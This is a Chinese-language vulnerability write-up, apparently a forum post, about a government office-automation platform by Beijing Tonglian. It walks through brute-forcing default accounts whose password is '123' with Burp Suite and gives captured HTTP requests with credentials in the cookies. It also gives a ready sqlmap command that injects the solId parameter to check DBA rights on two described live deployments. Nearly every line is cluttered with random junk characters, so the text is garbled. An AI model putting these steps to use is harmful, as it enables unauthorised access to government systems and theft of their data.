- s* D; q, {- u
# R4 ?( B& {7 s5 h4 Q
& W/ B$ q, G3 Y. d$ S9 r6 U
4 K9 {7 m# i2 E 平台简介:
# m" @; D; W; _7 k- o. N
6 @: M% [0 \+ m0 P" @3 X9 z: g. a: X- d! I2 g* c
5 S7 P+ S% F7 ^$ ~+ y
& r$ | c4 K: \6 P# S' y; s2 B: {
' Y$ Y M6 ]3 e( ^; v" y7 l3 f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 * e3 z* O o' `) @2 F
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
4 |+ ]; m# \3 e同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 r6 p8 F2 |4 J
( ^, ^) O7 P7 \! ~, O7 x' _6 Z6 c: }& i
$ v4 a0 k8 n7 a3 W: j$ I; |, ~- c
6 C+ M' |9 W9 `; S- I/ H+ ^2 E) C1 ?$ d' S8 W
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
) p) E' z* x6 S 6 T2 M& h- x# I; _& ]" P
/ R+ Q; G# p: ]- ] ~: ?. \
, j q/ c' s5 S9 y# [- K7 Y# u, a! {
\, }" v6 `; O+ K
+ D# U9 q Y# M3 O http://1.1.1.1:7197/cap-aco/#(案例2-)
5 R$ l a( r) |4 H
9 y. A2 o, V2 i3 E% o& j L( H8 s- H Y7 J2 }* ~
http://www.XXOO.com (案例1-官网网站)$ n4 H0 X$ \7 I, x/ G# h w% i
" i1 b! \+ U: ^3 a9 S
, O' V- ?: b% u! @2 Z: [; g , [/ P- u1 P; w, n) |
8 m" x+ z" ~4 B5 b, V5 E4 b, M
8 k) W2 u {6 e; v% \ 漏洞详情:
; J6 z3 l$ M+ O- ~ u3 \' i0 v' \, N
; n6 ?* @7 J5 f/ B4 @9 A4 y, {3 [7 o1 c4 D 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
/ x" Y: O. J7 n ! m, S1 {5 i; E
! d! {! u2 c" d 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
9 ~- C( }, Q3 {: n( l
& e. C: a, B) [9 X5 ~5 F( K$ q. y% N8 I
/ K4 i9 ?. t4 ?3 ?8 W5 I
. d H7 v5 V( F7 R2 Q
0 I; J& X2 j8 B& l ! b- O& M1 k4 N: p# |6 v
. U- x4 e! F- _) K6 l5 k
$ ]; r5 a; i2 P+ h
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
) z. j/ f( ?+ y
& u3 j6 x0 |3 ?+ G [
; q% t! e! c4 X( t1 s/ e 1、案例1-官方网站
) Y1 a9 f1 h- U% a/ G _
# h( B) A G+ {5 g j" L
3 j2 Z8 N; p$ d GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
8 r* {- p" e1 F% b2 a ' D3 k+ N9 S0 c; F
3 m& ?" e' j8 k S- ` Host: www.XXOO.com
6 Z5 Z- E- e% s5 t* {0 D6 i # c+ T, y' e$ |6 L, Z y
$ \; g5 q7 e% Z; Y Proxy-Connection: Keep-Alive
8 G: c9 q) f0 I ?9 g 7 T& a; H" I, x, R( ~
6 Q& ]7 }! o, S% N4 h6 p* y" S. j Accept: application/json, text/javascript, */*; q=0.01
; `# o, k0 ?8 T# G! Y
) a2 f8 `; w" v/ J6 J" q& o* q- w1 e$ F- E- Y' ` {4 U1 i& d$ l
Accept-Language: zh-CN& s* }: U5 J Y( C# J. Q: a1 }
: \( K: M3 W. u4 j& E+ D6 R
E0 k; ~$ G# ] {4 K+ i$ \! p Content-Type: application/json
( U. d1 \1 ~& Q6 o2 ?( ~6 i
! N, B; f2 r E, P1 C! X
K" B/ j' x8 J, G: X( Q ~ P User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko0 M& {% }- R" Q0 c8 S6 Y
: i& [2 @$ w+ I6 f$ z
2 f7 z) j4 C. P7 D X-Requested-With: XMLHttpRequest
6 ]8 ~0 i: V# ~* ^) M, j
7 e: o) B! x% A) B8 }* s' v# @: i/ M1 U
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
% T7 E1 u% [) b; v2 e" l- S# G
* s. s0 T- ?. a$ c1 ~
0 O" h0 L K5 n8 V1 E9 G Accept-Encoding: gzip, deflate, sdch& D3 Q8 T. v# d" Q3 z- p n
& t ~, Y2 k8 N g2 ^+ t, A; Z
$ }0 J7 b- ^6 p' f0 n
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
) n/ h# ~1 z @6 v. U9 f u7 N
3 F: _$ j; s! _8 f/ o5 F- J; ^- ^0 P) m
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 w2 F! B% o1 x2 x2 e
6 I! B8 z. [9 t3 S0 a- M2 B& V
7 } T& f$ \! I# Q" e ! D5 x# I% L/ l4 H' }1 s4 ?7 M
* q, m1 v! w3 @; o" h D: T, n- j' }! H3 v. o
) {* n3 q8 t! B. |* C0 R2 m3 g' S
3 s( W' y" o- b2 Z/ d
* ~4 w# k7 ]4 P, d ) Y) ~# l% C2 a; O1 ?
' B. k9 {- V9 O) F# B' S
9 f z% G) v+ ]; U . E' F& T1 v7 z7 t( ^, _
0 Z; }2 \; x* q+ v7 j
$ ~1 \1 c. @# N1 K/ s/ D
; u1 I" D8 f7 O' L( q, P* ~8 Q / h: h, c: ^0 ^- D! i/ z, \
) v8 v0 G9 H( }1 z# u) ^. k* Q0 P
2、案例2-某天河云平台. D7 w. e! s, N' Q1 x6 C
, S5 V" ], p2 d1 a! }3 B* C/ z I' [8 e8 V+ a' J
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
& ?. k5 Y5 ?8 C. ~* K/ D 4 d. |& H8 L# K5 F
' t7 n- X3 V: M5 _% J9 P5 l6 J Host: 1.1.1.:7197/ N: R1 \' q! ^8 Z% \) ]: O
/ b ?1 ~5 J2 O/ R: u% {
+ k' q4 O: J6 @, |$ D( {- l5 t Accept: application/json, text/javascript, */*; q=0.01
( n. `; Z$ V3 S, u* i3 | }, W5 T: \ ]! x
! Q/ F; I( | z6 ^( S |" y3 v X-Requested-With: XMLHttpRequest
6 O. p/ v6 |. p; Y * ~& i2 L; e, n# M5 p6 f! c3 i
+ r/ T9 {# L4 f1 T- ]) O9 @ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.02 V2 O" d. F, l- i- I
1 \3 a3 d: I) {) v
) ]3 p1 M8 T. a% ]- q& X3 q: F4 y Content-Type: application/json
/ @7 G W0 v5 r' f : ?! A5 ]2 t) n- @3 c9 |$ ]$ N
7 @+ Q* a2 p9 K' O u! b# q$ s7 i
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
' a% p! D3 [4 q* _' Y 4 Z- h( [3 _( D; w& O1 B# D
# Q0 q! |5 U* F3 j( W4 H4 P
Accept-Language: zh-CN,zh;q=0.80 s$ T2 S. ]* E0 D" \7 _
( M0 l" O- Q3 C. Y7 X) t- [
9 |4 t0 \) Z8 j5 f Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
; r8 E( X* _- n6 j
) j! c" E A. W
6 s; I% I. o& O- T Connection: close# u! ` Z: `: z3 A, \
, T: r: i! C# S+ x- }$ m- p) J
% Z8 q" {0 y$ \6 f& W
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:! a& t% `3 C& y
8 S+ Y' P! C' {* f) G0 e
) o V# M4 i& q- x$ r 8 c7 z, v3 r) _
/ D5 J2 ?& w' n: T( C8 V6 N6 E! l' K9 {7 C0 q2 x6 [
# T. N* D3 }. G( f" f |